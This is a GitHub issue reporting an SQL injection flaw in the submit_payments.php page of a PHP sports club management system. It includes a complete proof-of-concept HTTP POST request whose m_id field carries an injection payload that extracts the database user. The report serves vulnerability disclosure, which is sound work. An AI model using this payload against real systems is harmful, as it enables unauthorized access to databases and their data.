search

shreyansh225 / Sports-Club-Management-System

Developed an online Sports Club Management system for easy time scheduling and a user-friendly interface that gives real-time information about the member's details, Payment, Time scheduling, Sport availability using HTML, CSS, Bootstrap, PHP and XAMP Server.
28 stars 12 forks source link

SQL injection vulnerability in Sports Club Management System #6

Closed huclilu closed 2 years ago

huclilu commented 2 years ago

Build environment: Aapche2.4.39; MySQL5.5.29; PHP5.6.9

SQL injection vulnerability in Sports Club Management System

In admin/make Payments.php, at line 119, the information entered by the user is submitted to submit Payments.php, follow up the code, and we can see that the m entered by the user_ The ID is assigned to $memID. Without any filtering, it is directly inserted into the database for query, and the query results are returned, causing SQL injection vulnerabilities

POC:

POST /dashboard/admin/submit_payments.php HTTP/1.1
Host: sportsvul.test
Content-Length: 213
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://sportsvul.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://sportsvul.test/dashboard/admin/make_payments.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ogqe8040ok4a08i16t97ng7734
Connection: close

m_id=1529336794' and (select 2*(if((select * from (select concat((select user())))s), 8446744073709551610, 8446744073709551610)))-- &u_name=Christiana+Mayberry&prevPlan=Football+Plan&plan=BOQKJB&submit=ADD+PAYMENT